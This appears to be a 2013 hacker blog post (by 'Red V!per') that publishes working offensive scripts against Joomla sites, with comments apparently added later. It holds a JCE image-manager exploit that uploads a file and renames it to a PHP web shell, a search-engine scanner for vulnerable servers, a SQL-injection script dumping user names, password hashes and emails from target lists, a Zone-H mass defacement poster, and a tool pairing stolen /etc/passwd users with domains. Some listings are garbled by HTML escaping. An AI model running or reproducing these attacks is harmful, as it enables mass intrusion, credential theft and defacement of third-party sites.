        $packet .= $data;


            // The request is written and the socket closed at once; the
            // server's answer is never read.
            $fp = fsockopen('tcp://' . $host, 80, $errno, $errstr, 5);

            if ($fp) {

                fwrite($fp, $packet);

                fclose($fp);

            }


        // Exchange 3: JSON call asking the image manager to rename the
        // uploaded mua.gif to vanda.php.
        $packet = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1\r\n";

        $packet .= "Host: " . $host . "\r\n";

        $packet .= "User-Agent: Mua \r\n";

        $packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";

        $packet .= "Accept-Language: en-US,en;q=0.8\r\n";

        $packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";

        $packet .= "Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n";

        $packet .= "Accept-Encoding: deflate\n";

        $packet .= "X-Request: JSON\r\n";

        $packet .= "Cookie: __utma=216871948.2116932307.1317632284.1317639575.1317734968.3; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=216871948.20.10.1317734968; __utmc=216871948; jce_imgmanager_dir=%2F; 6bc427c8a7981f4fe1f5ac65c1246b5f=7df6350d464a1bb4205f84603b9af182\r\n";

        $ren = "json={\"fn\":\"folderRename\",\"args\":[\"/mua.gif\",\"vanda.php\"]}";

        $packet .= "Content-Length: " . strlen($ren) . "\r\n\r\n";

        $packet .= $ren . "\r\n\r\n";

            $fp = fsockopen('tcp://' . $host, 80, $errno, $errstr, 5);

            if ($fp) {

                fwrite($fp, $packet);

                fclose($fp);

            }

        $taranmis = $taranmis + 1;

            // Exchange 4: read the fixed path back and look for the marker.
            // Success is judged only by "GIF89a1" appearing in the response.
            $kod      = oku("http://" . $host . "/images/stories/vanda.php");

            $pozisyon = strpos($kod, "GIF89a1");

            if ($pozisyon == true) {

                $kirilmis = $kirilmis + 1;

                fwrite($kirilanlar, "http://" . $host . "/images/stories/vanda.php\r\n");

            }
    } //for each


    // NOTE(review): $yaz is not opened anywhere in the visible code.
    fclose($yaz);

    fclose($kirilanlar);

Download Bash Script :http://www.mediafire.com/view/2rk5ikxu1k1kon3/jce-scanner-exploiter.sh

Download jce.php : http://www.mediafire.com/view/p8210ab5d0duj9y/jce.php



Friday, August 23, 2013

Server Jce Scanner




D3m00 : http://www.mediafire.com/download/04357l3y8t8cerv/jce-scanner%282%29.mp4

#!/bin/bash
# Jce Server Scanner
# Coded By : Red V!per  
# http://redhat-viper.blogspot.com
# Report Bugs : RedH4t.Viper@yahoo.com
# D3m00 : http://www.mediafire.com/download/04357l3y8t8cerv/jce-scanner%282%29.mp4
# Tnx 2   : All Turkish && Persian Hacker

#-------------------- Red V!per Banner ----------------------------------------------------------------------------

Banner()
{
# Clear the screen, draw the framed logo (blue frame, red and green lettering),
# pause three seconds, print the title and prompt for the address to work on.
# Globals: B, N (read); IP (written by the prompt).
clear 
echo -e '\E[34m'" ||______________________________________________________|| "; tput sgr0
echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
echo -e '\E[34m'" ||                                                      || "; tput sgr0
echo -e '\E[34m'" ||\E[31m  _____          _  __      ___                       \E[34m|| "; tput sgr0 
echo -e '\E[34m'" ||\E[31m |  __ \        | | \ \    / / |                      \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m | |__) |___  __| |  \ \  / /| |_ __   ___ _ __       \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m |  _  // _ \/ _\ |   \ \/ / | | '_ \ / _ \ '__|      \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m | | \ \  __/ (_| |    \  /  |_| |_) |  __/ |         \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m |_|  \_\___|\__,_|     \/   (_) .__/ \___|_|         \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m                               | |                    \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m                               |_|                    \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m   _                                                  \E[34m|| "; tput sgr0     
echo -e '\E[34m'" ||\E[32m  (_)                                                 \E[34m|| "; tput sgr0  
echo -e '\E[34m'" ||\E[32m   _  ___ ___   ___  ___ __ _ _ __  _ __   ___ _ __   \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m  | |/ __/ _ \ / __|/ __/ _\ | '_ \| '_ \ / _ \ '__|  \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m  | | (_|  __/ \__ \ (_| (_| | | | | | | |  __/ |     \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m  | |\___\___| |___/\___\__,_|_| |_|_| |_|\___|_|     \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m _/ |                                                 \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m|__/                                                  \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
echo -e '\E[34m'" ||______________________________________________________|| "; tput sgr0
sleep 3
echo
echo -e "$B /\ (^_^) /\ [public] \n"
echo -e " -===============================================-\n"
echo -e "   Server Jce Scanner "
echo  
echo -e "   BY : Red V!per\n"
echo -e " -===============================================-"
echo
echo
echo -e " -========== [         INFO         ] ===========-"
echo
# The typed value is stored verbatim; scan_jce_on_victim later places it in a
# search URL without checking that it is an address.
read -p "[*] Target Ip : " IP
echo -e "$N"
}

#-------------------- Variables ----------------------------------------------------------------------------

# ANSI SGR escape sequences: bold, reset, blink, reset. The functions in this
# script reference only B and N.
B="\033[1m"
N="\033[0m"
L="\033[5m"
C="\033[m"

#-------------------- Scanning Jce Targets on Server  -------------------------------------------------------

scan_jce_on_victim()
{
# Collect the sites a search engine lists for $IP and probe each one for the
# JCE image manager. This variant only records responders; it uploads nothing.
# Globals: IP (read, set by Banner), B (read); page, how_many, single_page,
#          last_page_check, image_manager, url, check (written).
# Files:   works through domain_bing.php, alldomain_bing.txt and domains.txt
#          in the current directory and appends hits to jce_server.lst.
#          domains.txt is left behind.
#
# Defensive reading: each listed site receives one request for
# index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
# version=1576&cid=20 on its www. host name. That request from a client with
# no prior session is the log indicator of this probe.
page=0  
how_many=1  
single_page=  
last_page_check=
image_manager="index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20"

 # Page through the search results until the result counter reports the last
 # page ("N-M of M"), is missing altogether, or shows a single-digit total.
 while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do  
  
url="http://www.bing.com/search?q=ip%3a$IP+%27index.php?option=com_%27&qs=n&pq=ip%3a$IP+%27index.php?option=com_%27&sc=8-26&sp=-1&sk=&first=${page}1&FORM=PERE"  
  
 wget -q -O domain_bing.php --user-agent="Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9b5) Gecko/2008050509 Firefox/3.0b5" "$url"  
  
 last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' domain_bing.php`  
    
 how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' domain_bing.php | cut -d '>' -f 2|cut -d ' ' -f 1-3`  
  
 single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' domain_bing.php `  
  
  
  # egrep is given the file name, so the piped output of cat is ignored.
  cat domain_bing.php | egrep -o "<h3><a href=\"[^\"]+" domain_bing.php | cut -d '"' -f 2 >> alldomain_bing.txt  
  rm -f domain_bing.php  
  let page=$page+1   
  done  
  
# Reduce the result links to bare lower-case host/path entries: keep links
# containing "com_", drop the scheme, "www" plus the following character
# (the dot in the sed pattern is unescaped), the query string and a trailing
# /index.php, then de-duplicate.
cat alldomain_bing.txt | grep "com_" | tr '[:upper:]' '[:lower:]' | awk '{gsub("http://","")}1' | awk '{gsub("https://","")}1' | sed '/www./s///g' | cut -d '?' -f 1 | awk '{gsub("/index.php","")}1' | sort | uniq >> domains.txt
  
for domain in `cat domains.txt`  
   do  
     # GET is presumably the lwp-request command (status line only) - confirm.
     # A status containing "OK" is treated as "image manager reachable".
     GET -sd "http://www.$domain/$image_manager" | grep "OK" >> /dev/null;check=$?
      if [ $check -eq 0 ]
         then
     echo -e "$B[+] www.$domain/ \e[1;32m[OK] \e[0m"
         echo "$domain/" >> jce_server.lst
       else
         echo "[-] www.$domain/ [No] "
      fi    
   done  
rm -rf alldomain_bing.txt 
}

#-------------------- Remove  ------------------------------------------------------------------------
all_remove()
{
 # Clear leftovers of a previous run from the current directory.
 # The globs are deliberately unquoted. They are broad (domains*,
 # jce_server*) and mostly recursive, so unrelated entries in the working
 # directory whose names start with these prefixes are deleted as well.
 rm -rf alldomain_bing* domains_f*
 # Not recursive: a directory matching domain_bing* is left in place.
 rm -f domain_bing*
 rm -rf domains* jce_server*
}

#-------------------- Main Brain :D  ------------------------------------------------------------------------
main()
{
# Orchestrates one run: show the banner and prompt for the address, clear
# leftovers of earlier runs (including an earlier jce_server list), then scan.
Banner;
all_remove;
scan_jce_on_victim;
}

# Script entry point.
main;
Download : http://www.mediafire.com/view/g9955347r9ht6y7/jce-scanner.sh

Tuesday, August 20, 2013

Joomla (com_ignitegallery) Remote Exploit

D3m00 : http://www.mediafire.com/download/dxeob7as8bgozwo/Joomla-com_ignitegallery-remoot-exploit.mp4
#!/bin/bash
#Joomla (com_ignitegallery) Remote Exploit
#Dork: inurl:"option=com_ignitegallery"
#Coded By Red V!per
# D3m00 : http://www.mediafire.com/download/dxeob7as8bgozwo/Joomla-com_ignitegallery-remoot-exploit.mp4
#Tnx 2 : All Turkish && Persian Hackers

B="\033[1m"
N="\033[0m"
L="\033[5m"
C="\033[m"


if [[ $# != 1  ]]; then
  clear
  echo
  echo -e "$B  Joomla (com_ignitegallery) Remote Exploit - 240\n"
  echo -e " -=============================================-\n"
  echo -e "  Joomla Ignite Gallery 0.8.3.1 SQL Injection \n"
  echo  
  echo -e "  By Red Hat V!per\n"   
  echo -e " -=============================================-\n"  
  echo -e "   example: ./JCI-RE.sh targets.lst \n"
  echo -e "\n Run:$B ./JCI-RE.sh  $N\n"
  exit 1
fi

VICTIMS=$1    

clear
echo
echo -e "$B Joomla (com_ignitegallery) Remote Exploit [public] - 240\n"
echo -e " -===============================================-\n"
echo -e "   Joomla Ignite Gallery 0.8.3.1 SQL Injection "
echo  
echo -e "   BY : Red V!per\n"
echo -e " -===============================================-"
echo
echo
echo -e " -========== [         INFO         ] ===========-"
echo
echo -e "  [+] Checking :$B $VICTIMS"
echo


Exploit="%20union%20select%201,2,concat%28username,0x3a,password,0x3a,email,0x3a,activati​on%29,4,5,6,7,8,9,10%20from%20jos_users--&Itemid=18&3ca3a605131cf698f0c10708dbd5d5f5=b908cde49509d2ec9b39f7e46c9088e8&3ca3a605131cf698f0c10708dbd5d5f5=b908cde49509d2ec9b39f7e46c9
088e8"

pars_respone()
{

keyword=`cat page.php | grep "[a-zA-Z0-9]:[0-9]"`
username=`echo "$keyword" | grep "

" | cut -d ':' -f 1 |sed -e 's/^[ \t]*//' | awk '{gsub("

","")}1'` pass_1=`echo "$keyword" | grep "

" | cut -d ':' -f 2` pass_2=`echo "$keyword" | grep "

" | cut -d ':' -f 3` password="$pass_1:$pass_2" email=`echo "$keyword" | grep "

" | cut -d ':' -f 4` echo -e "[~] $B Host : $url_1=$url_2"; echo -e "[~] $B Username : $username"; echo -e "[~] $B Password : $password"; echo -e "[~] $B Email : $email"; echo -e "" } pars_url() { rm -rf page.php* url_1=`echo "$1" | cut -d '=' -f 1,2,3` url_2=`echo "$1" | cut -d '=' -f 4` url=""$url_1"=-"$url_2""$Exploit"" wget -q -O page.php "$url" pars_respone; } for trg in `cat $VICTIMS` do pars_url $trg done
Download Script : http://www.mediafire.com/view/c2kwa9cpm1m030d/joomla-remote-exploit.sh

Thursday, August 15, 2013

Red V!per Joomla Version Checker

 
#!/bin/bash
# Red V!per Joomla Version Checker
# Coded By Red H4t V!per
# Tnx 2 : Pawel Frankowski

url="$1"

Usage()
{
  echo ""
  echo "# ***************************************************************************​****​*********************#"
  echo "# Usage      : Red V!per Joomla Version Checker <target>                                             *#"
  echo "# Help       : -h && --help : Show This Menu                                                         *#"
  echo "# RunScript  : Give Permision to script and run it !!                                                *#"
  echo "# Example    : ./script.sh www.example.com/joomla/                                                   *#"
  echo "# ***************************************************************************​****​*********************#"
  echo ""
  exit
}

Check_Arguments()
{
  # Show the help text and stop when no target was given or when help was
  # requested with -h / --help; otherwise fall through and return.
  # Globals: url (read).
  case "$url" in
    ''|-h|--help)
      Usage
      exit
      ;;
  esac
}

# Fingerprint the Joomla release served at "$url" by downloading up to
# three static files and grepping them for release-specific strings.
# Globals:  url (read); Version, version, i (written)
# Files:    wget saves system.css, mootools-more.js and en-GB.ini into the
#           current directory; they are only removed by pre_remove on the
#           next run.
# Outputs:  progress lines and, on a match, the detected release on stdout.
# Returns:  exits the script on the first match; returns normally when no
#           probe matched.
# Log view: the requests go to /templates/system/css/system.css, then
#           /media/system/js/mootools-more.js, then
#           /language/en-GB/en-GB.ini under the target path. wget is called
#           without --user-agent, so its default agent string is sent.
# wget runs with -q and its exit status is never checked: a failed download
# only shows up as an error from cat and an empty match.
Check_Joomla_Version()
{
clear
i=0
echo -e '\E[32m'"[*] Start Check ..."; tput sgr0
echo -e '\E[32m'"[*] Testing method ($i) ..."; tput sgr0

# Probe file 1 of 3: the system template stylesheet.
wget -q "$url/templates/system/css/system.css"

Version=`cat system.css | grep "OpenID icon style"`
if [ -z "$Version" ]; then
let i=$i+1
echo -e '\E[32m'"[*] Testing method ($i) ..."; tput sgr0
sleep 0.5
else
echo -e '\E[32m'"[*] Found : $url (joomla) Version is 1.5 "; tput sgr0
echo -e '\E[32m'"[*] Finish ..."; tput sgr0
exit
fi

# NOTE(review): the next three probes store the grep result in lowercase
# "version" but test uppercase "Version", which is still empty whenever
# execution reaches this point. Their "Found" branches therefore never run
# and the counter always advances; 1.6, 1.7 and 2.5 can only be reported by
# the later mootools-more.js and en-GB.ini probes.
version=`cat system.css | grep "2011-01-09 02:40:25Z ian"`
if [ -z "$Version" ]; then
let i=$i+1
echo -e '\E[32m'"[*] Testing method ($i) ..."; tput sgr0
sleep 0.5
else
echo -e '\E[32m'"[*] Found : $url (joomla) Version is 1.6 "; tput sgr0
echo -e '\E[32m'"[*] Finish ..."; tput sgr0
exit
fi

version=`cat system.css | grep "2011-05-11 01:10:29Z dextercowley"`
if [ -z "$Version" ]; then
let i=$i+1
echo -e '\E[32m'"[*] Testing method ($i) ..."; tput sgr0
sleep 0.5
else
echo -e '\E[32m'"[*] Found : $url (joomla) Version is 1.7 "; tput sgr0
echo -e '\E[32m'"[*] Finish ..."; tput sgr0
exit
fi

version=`cat system.css | grep "2012 Open Source Matters"`
if [ -z "$Version" ]; then
let i=$i+1
echo -e '\E[32m'"[*] Testing method ($i) ..."; tput sgr0
sleep 0.5
else
echo -e '\E[32m'"[*] Found : $url (joomla) Version is 2.5 "; tput sgr0
echo -e '\E[32m'"[*] Finish ..."; tput sgr0
exit
fi

# Probe file 2 of 3: requested only when system.css did not settle it.
wget -q "$url/media/system/js/mootools-more.js"

Version=`cat mootools-more.js | grep "MooTools={version:"`
if [ -z "$Version" ]; then
let i=$i+1
echo -e '\E[32m'"[*] Testing method ($i) ..."; tput sgr0
sleep 0.5
else
echo -e '\E[32m'"[*] Found : $url (joomla) Version is 1.5 "; tput sgr0
echo -e '\E[32m'"[*] Finish ..."; tput sgr0
exit
fi

# The dots in the next three patterns are regex wildcards, not literal dots.
Version=`cat mootools-more.js | grep "1.3.0.1"`
if [ -z "$Version" ]; then
let i=$i+1
echo -e '\E[32m'"[*] Testing method ($i) ..."; tput sgr0
sleep 0.5
else
echo -e '\E[32m'"[*] Found : $url (joomla) Version is 1.6 "; tput sgr0
echo -e '\E[32m'"[*] Finish ..."; tput sgr0
exit
fi

Version=`cat mootools-more.js | grep "1.3.2.1"`
if [ -z "$Version" ]; then
let i=$i+1
echo -e '\E[32m'"[*] Testing method ($i) ..."; tput sgr0
sleep 0.5
else
echo -e '\E[32m'"[*] Found : $url (joomla) Version is 1.7 "; tput sgr0
echo -e '\E[32m'"[*] Finish ..."; tput sgr0
exit
fi

Version=`cat mootools-more.js | grep "1.4.0.1"`
if [ -z "$Version" ]; then
let i=$i+1
echo -e '\E[32m'"[*] Testing method ($i) ..."; tput sgr0
sleep 0.5
else
echo -e '\E[32m'"[*] Found : $url (joomla) Version is 2.5.6 or 3.0 alpha 2 "; tput sgr0
echo -e '\E[32m'"[*] Finish ..."; tput sgr0
exit
fi

# Probe file 3 of 3: the English language file.
wget -q "$url/language/en-GB/en-GB.ini"

Version=`cat en-GB.ini | grep "11391 2009-01-04 13:35:50Z ian"`
if [ -z "$Version" ]; then
let i=$i+1
echo -e '\E[32m'"[*] Testing method ($i) ..."; tput sgr0
sleep 0.5
else
echo -e '\E[32m'"[*] Found : $url (joomla) Version is 1.5.26 "; tput sgr0
echo -e '\E[32m'"[*] Finish ..."; tput sgr0
exit
fi

Version=`cat en-GB.ini | grep "20196 2011-01-09 02:40:25Z ian"`
if [ -z "$Version" ]; then
let i=$i+1
echo -e '\E[32m'"[*] Testing method ($i) ..."; tput sgr0
sleep 0.5
else
echo -e '\E[32m'"[*] Found : $url (joomla) Version is 1.6.0 "; tput sgr0
echo -e '\E[32m'"[*] Finish ..."; tput sgr0
exit
fi

Version=`cat en-GB.ini | grep "2011-03-18 16:42:30Z infograf768"`
if [ -z "$Version" ]; then
let i=$i+1
echo -e '\E[32m'"[*] Testing method ($i) ..."; tput sgr0
sleep 0.5
else
echo -e '\E[32m'"[*] Found : $url (joomla) Version is 1.6.5 or 1.7.1 "; tput sgr0
echo -e '\E[32m'"[*] Finish ..."; tput sgr0
exit
fi

Version=`cat en-GB.ini | grep "22183 2011-09-30 09:04:32Z infograf768"`
if [ -z "$Version" ]; then
let i=$i+1
echo -e '\E[32m'"[*] Testing method ($i) ..."; tput sgr0
sleep 0.5
else
echo -e '\E[32m'"[*] Found : $url (joomla) Version is 1.7.3 or 1.7.5 "; tput sgr0
echo -e '\E[32m'"[*] Finish ..."; tput sgr0
exit
fi

Version=`cat en-GB.ini | grep "<version>2.5.0"`
if [ -z "$Version" ]; then
let i=$i+1
echo -e '\E[32m'"[*] Testing method ($i) ..."; tput sgr0
sleep 0.5
else
echo -e '\E[32m'"[*] Found : $url (joomla) Version is 2.5.0 -> 2.5.4 "; tput sgr0
echo -e '\E[32m'"[*] Finish ..."; tput sgr0
exit
fi

# Last probe: no counter increment; on a miss the function simply returns.
Version=`cat en-GB.ini | grep "<version>2.5.5"`
if [ -z "$Version" ]; then
echo -e '\E[32m'"[*] Shit :( Not Found ..."; tput sgr0
sleep 0.5
else
echo -e '\E[32m'"[*] Found : $url (joomla) Version is 2.5.5 or 2.5.6 "; tput sgr0
echo -e '\E[32m'"[*] Finish ..."; tput sgr0
exit
fi
}

# Delete downloads left in the current directory by an earlier run, so
# that wget saves fresh copies under the plain file names.
# Each name is removed together with anything sharing its prefix
# (for example the numbered copies wget creates when a file already exists).
pre_remove()
{
 local leftover
 for leftover in system.css mootools-more.js en-GB.ini
 do
  rm -rf "$leftover"*
 done
}

# Entry point of the version checker.
# Order matters: stale downloads are deleted before the argument is
# validated, so the clean-up also happens when only help is shown.
main()
{
  pre_remove
  Check_Arguments
  Check_Joomla_Version
}

main

Download :http://www.mediafire.com/download/qcu94wd73p72z78/RedViper-Joomla-Version-Chcker.sh

Tuesday, July 23, 2013

TBH Zone-H Mass Poster




#!/bin/bash 
# TBH Zone-H Mass Poster
#c0ded by Red V!per


# $1: name submitted in the "defacer" form field.
# $2: path of the list file that is read entry by entry.
notifier=${1}
sites=${2}
# Fixed submission endpoint used for every entry.
url='http://www.zone-h.org/notify/single'


# Print the green ASCII-art logo, framed by one blank line above and below.
# Each art row is printed with the green escape sequence and followed by
# "tput sgr0" to reset the terminal attributes.
banner()
{
  local -a art=(
    '_________ ______             '
    '\__   __/(  ___ \ |\     /|  '
    '   ) (   | (   ) )| )   ( |  '
    '   | |   | (__/ / | (___) |  '
    '   | |   |  __ (  |  ___  |  '
    '   | |   | (  \ \ | (   ) |  '
    '   | |   | )___) )| )   ( |  '
    '   )_(   |/ \___/ |/     \|  '
  )
  local row

  echo            "                             "
  for row in "${art[@]}"; do
    echo -e '\E[32m'"$row"; tput sgr0
  done
  echo            "                             "
}


# Print the help banner of the mass poster and end the script.
# Outputs: eight lines on stdout (blank, six banner lines, blank).
# Returns: never returns; exits with the status of the print.
Usage()
{
  printf '%s\n' \
    "" \
    "# ***************************************************************************​****​*********************#" \
    "# Usage      : TBH Zone-H Mass Poster  <defacer> <sites.lst>                                         *#" \
    "# Help       : -h && --help : Show This Menu                                                         *#" \
    "# RunScript  : Give Permision to script and run it !!                                                *#" \
    "# Example    : ./script.sh www.example.com  ye_bande_khoda sites.lst                                 *#" \
    "# ***************************************************************************​****​*********************#" \
    ""
  exit
}


# Stop with the help text when the first argument is missing or asks for help.
# Globals: notifier (read)
# Only the first argument is inspected; the list-file argument is not checked.
Check_Arguments()
{
  case "$notifier" in
    ""|-h|--help)
      Usage
      exit
      ;;
  esac
}

# Send one HTTP POST to "$url" for every entry of the list file.
# Globals: sites (read; path of the list file), notifier (read), url (read),
#          targets (written; loop variable, not local)
# Each request carries the form fields defacer, domain1, hackmode and
# reason, with a fixed "Mozilla/5.0" user agent. curl is started in the
# background and never waited for; the loop pauses two seconds between
# entries. The list is read through an unquoted `cat`, so entries are
# split on any whitespace, not only on line ends.
Mass_Post()
{
for targets in `cat $sites`
do
       curl --user-agent "Mozilla/5.0" --silent --data "defacer=$notifier&domain1=$targets&hackmode=1&reason=1" ${url} &
       sleep 2
done
}

# Entry point: show the logo, validate the first argument, then process
# the list file.
Main()
{
  banner
  Check_Arguments
  Mass_Post
}

Main

Download : http://www.mediafire.com/download/j10du919tq25f2d/TBH+Zone-H+Mass+Poster.zip

Saturday, July 20, 2013

Web Exploiter Toolkit



This script makes tasks such as client hacking, web hacking and wireless hacking easy ...

Now Working on it ...

https://github.com/RedH4tViper/webexploiter

Red V!per User Domain Extractor


Create an etc-passwd.txt file beside the User+Domain Extractor script, insert the contents of the
/etc/passwd file into etc-passwd.txt, then give the script permission and run it.


#!/bin/bash
#
# ---------------------------------
# User+Domain Extractor 
# Licence : Linux
# ---------------------------------
#
# Title   : User+Domain Extractor
# Code    : Bash
# Author  : RedH4t.Viper
# Email   : RedH4t.Viper@Gmail.com , RedH4t.Viper@yahoo.com
# Date    : 2013 06 May
# Home    : IrIsT Security Center
# Thanks  : IrIsT ,TBH ,kurdhackteam , 3xp1r3
#
# Gr33tz  : Am!r | C0dex | B3HZ4D | TaK.FaNaR | 0x0ptim0us | Net.W0lf |
# Gr33tz  : Skote_Vahshat| Dj.TiniVini| Mr.XHat | Black King |
# Gr33tz  : E2MAEN | Mr.F@RDIN | M4st3r4N0nY | ICA_r00t | m3hdi |
# Gr33tz  : x3o-1337 | rEd X | No PM  | Gabby | Sukhoi Su-37
# Gr33tz  : ARTA | H-SK33PY | (^_^) | Turk Sever | And All Of IrIsT Memebrz
#------------------------------------------------------------------------------------------#


# Script-wide state. The three empty values and how_many drive the
# result-page loop in get_reverse; page is the current result-page index.
IP=""
F_ARG=${1}
page=0
last_page_check=""
how_many=1
single_page=""


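# Print the help text of the User+Domain Extractor.
# Outputs: eight lines on stdout (blank, six banner lines, blank).
# Returns: 0; unlike some sibling scripts this Usage does not exit, the
#          caller does.
Usage()
{
 echo ""
 echo "# ****************************************************************************************************#"
 echo "# Usage      : User+Domain Extractor <ip>                                                            *#"
 # The published listing printed the HTML-escaped form of "&&" here.
 echo "# Help       : -h && --help : Show This Menu                                                         *#"
 echo "# RunScript  : create etc-passwd.txt file Besides User+Domain Extractor script and insert Contents   *#"
 echo "# RunScript  : of /etc/passwd file Within etc-passwd.txt then Give Permision to script and run it !! *#"
 echo "# ****************************************************************************************************#"
 echo ""
}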

# Build reversed.txt, a list of host names reported for one IP address by
# three public web sources.
# Globals: F_ARG (read); IP, url, page, how_many, single_page,
#          last_page_check and several loop variables (written)
# Files:   fixed-name scratch files in the current directory; reversed.txt
#          is appended to, never truncated here.
# Network: requests go to www.my-ip-neighbors.com, ip.kenh12.com and
#          www.bing.com only.
# NOTE(review): this listing was damaged by the page rendering. "&gt;",
# "&lt;" and "&amp;" are HTML-escaped ">", "<" and "&", and the two
# extraction pipelines marked below were mangled into HTML attributes. As
# published the function is not valid shell.
get_reverse()
{

# check IP
# The pattern is unanchored: any argument that contains a dotted quad or a
# bracketed hex/colon group is taken as an IP without further validation.
  if [ `echo "$F_ARG" | egrep  "(([0-9]+\.){3}[0-9]+)|\[[a-f0-9:]+\]"`  ]; then
   IP="$F_ARG"
   else
    IP=`resolveip -s "$F_ARG"`
     if [ "$?" != 0 ]; then
       echo -e "               [-] Error: cannot resolve $F_ARG to an IP "
       exit
     fi
   fi

 url_neighbors="http://www.my-ip-neighbors.com/?domain=$IP"

 wget -q -O  my-ip-neighbors.php "$url_neighbors"

# NOTE(review): mangled line; the original pipeline into whois_neighbors.txt
# cannot be recovered from what is shown.
 cat my-ip-neighbors.php | egrep -o '<a -d="" -f4="" cut="" href="http://whois.domaintools.com/%5B%5E" sort="" uniq="">&gt; whois_neighbors.txt


 url_kenh12="http://ip.kenh12.com/Reverse-IP-Lookup-DNS-Domain/$IP.html"
 wget -q -O  my-ip-kenh12.php "$url_kenh12"

 cat my-ip-kenh12.php | egrep -o "gif' alt=[^&gt;]+" | cut -d '=' -f2 | sed '/www./s///g' | sort | uniq &gt;&gt; whois_kenh12.txt


# Page through the search results until the last page, an empty result
# count or a single-page result is detected.
while [ -z "$last_page_check" ] &amp;&amp; [ -n "$how_many" ] &amp;&amp; [ -z "$single_page" ]; do


 url="http://www.bing.com/search?q=ip%3A$IP&amp;go=&amp;qs=n&amp;first=${page}0&amp;FORM=PERE"

 wget -q -O bing.php "$url"

 last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' bing.php`

 # if no results are found, how_many is empty and the loop will exit
 how_many=`egrep -o '<span class="sb_count" id="count">[^&lt;]+' bing.php |cut -d '&gt;' -f 2|cut -d ' ' -f 1-3`

 # check for a single page of results
 single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' bing.php`


# NOTE(review): mangled block; the pipeline that fills alldomain_bing.txt
# cannot be recovered from what is shown.
 cat "bing.php"| egrep -o "</span></span></span></a>

<h3>
<span class="sb_count" id="count"><span class="sb_count" id="count"><span class="sb_count" id="count"><a -d="" -f="" 2="" bing.php="" cut="" href="http://www.blogger.com/%5C">&gt; alldomain_bing.txt
let page=$page+1
 rm -f bing.php
done

# Reduce each collected URL to its lower-cased host part.
cat alldomain_bing.txt | cut -d '/' -f 3 | tr '[:upper:]' '[:lower:]' | sed '/www./s///g' | sort | uniq &gt;&gt; whois_bing.txt
rm alldomain_bing.txt ;


# Merge the three per-source lists into reversed.txt.
   for line_bing in `cat whois_bing.txt`
     do
       echo "$line_bing" &gt;&gt; reversed.txt
     done

   for line_neighbors in `cat whois_neighbors.txt`
    do
       echo "$line_neighbors" &gt;&gt; reversed.txt
    done
 
   for line_kenh12 in `cat whois_kenh12.txt`
    do
       echo "$line_kenh12" &gt;&gt; reversed.txt
    done

    rm whois_bing.txt;
    rm whois_neighbors.txt;
    rm whois_kenh12.txt;
    rm my-ip-neighbors.php;
    rm my-ip-kenh12.php;

}

# Append to user.txt the first field (the login name) of every line of
# etc-passwd.txt that contains "/home" anywhere on the line.
# etc-passwd.txt is read from the current directory and must be supplied
# by whoever runs the script.
# NOTE(review): "&gt;&gt;" is an HTML-escaped ">>" left by the page
# rendering; as published this line is not valid shell.
get_user()
{
cat etc-passwd.txt | egrep  "/home" | cut -d ':' -f 1 &gt;&gt;user.txt
}

# Pair each login name from user.txt with the host names in reversed.txt
# that contain it, print the pairs and append them to ListUserDomain.txt.
# Globals: reverse, site, check (written; not local)
# The login name is passed to grep as a regular expression and matched as
# a substring, so a pair is reported only when the name appears inside a
# host name, and short names can match unrelated hosts. "site" holds every
# matching line, so one report line may list several hosts.
# user.txt and reversed.txt are deleted at the end.
# NOTE(review): "&gt;&gt;" is an HTML-escaped ">>" left by the page
# rendering; as published these lines are not valid shell.
get_user_with_site()
{
for reverse in `cat user.txt`
do
site=`cat reversed.txt | grep "$reverse"`
cat reversed.txt | grep "$reverse" &gt;&gt; /dev/null;check=$?
           if [ $check -eq 0 ]
                then
                echo -e "[+] Found : User: "$reverse" \t Site: $site"
                echo -e "[+] Found : User: "$reverse" \t Site: $site" &gt;&gt;ListUserDomain.txt
           fi
done
rm -rf user.txt
rm -rf reversed.txt
}

# Entry point: validate the argument, then run the three stages in order.
main()
{
  # Show the help text and stop when no argument or a help flag was given.
  case "$F_ARG" in
    ""|-h|--help)
      Usage
      exit
      ;;
  esac

  get_reverse
  get_user
  get_user_with_site
}

main

Download: http://www.mediafire.com/download/ismd5f47n7hs7my/User_Domain_Extractor.sh 

Red V!per Sub Domain Scanner



#!/bin/bash
# WebExploiter Sub Domain Scanner
# Coded By : Red H4t V!per

# Script-wide state: page is the result-page index, URL the first
# argument; the empty values and how_many drive the result-page loop.
page=0
how_many=1
URL=${1}
domain=""
single_page=""
last_page_check=""

# Print the seven-line ASCII-art title of the sub domain scanner.
banner()
{
printf '%s\n' \
  "           _         _                       _                                              " \
